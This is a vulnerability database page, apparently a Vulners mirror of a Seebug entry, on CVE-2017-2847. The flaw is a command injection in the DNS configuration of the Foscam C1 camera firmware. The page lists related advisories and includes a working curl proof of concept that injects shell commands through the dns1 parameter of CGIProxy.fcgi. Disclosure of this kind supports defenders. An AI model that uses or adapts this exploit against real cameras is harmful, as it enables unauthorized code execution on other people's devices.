Lucene search
+L

Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability(CVE-2017-2847)

🗓️ 15 Sep 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 42 Views

A command injection vulnerability in Foscam C1 Indoor HD Camera application firmware 2.52.2.37 allows arbitrary shell characters injection through a specially crafted HTTP request

Related
Code
ReporterTitlePublishedViews
Family
circl
CVE-2017-2847
9 Jul 202612:37
circl
cnvd
Foscam C1 Indoor HD Camera cgiproxy.fcgi -DNS1.address configuration command injection vulnerability
3 Jul 201700:00
cnvd
cve
CVE-2017-2847
29 Jun 201717:00
cve
cvelist
CVE-2017-2847
29 Jun 201717:00
cvelist
euvd
EUVD-2017-11988
7 Oct 202500:30
euvd
nvd
CVE-2017-2847
29 Jun 201717:29
nvd
osv
CVE-2017-2847
29 Jun 201717:29
osv
prion
Command injection
29 Jun 201717:29
prion
seebug
Foscam IP Video Camera Command Injection Vulnerability(CVE-2017-2847)
4 Jul 201700:00
seebug
talos
Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability
19 Jun 201700:00
talos
Rows per page

                                                $ sUsr="admin"
$ sPwd=""
$ sIP=192.168.0.20
$ sMask=255.255.255.0
$ sGW=192.168.0.1
$ sDns1=1.1.1.1
$ sDns2=2.2.2.2
$ sCmd=`perl -MURI::Escape -e 'print uri_escape(";id>/tmp/www/inj;")'`
$ curl "http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=guest&pwd=asd0--&cmd=setIpInfo&isDHCP=0&ip=${sIP}&mask=${sMask}&gate=${sGW}&dns1=${sDns1}${sCmd}&dns2=${sDns2}"
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Sep 2017 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.04527
42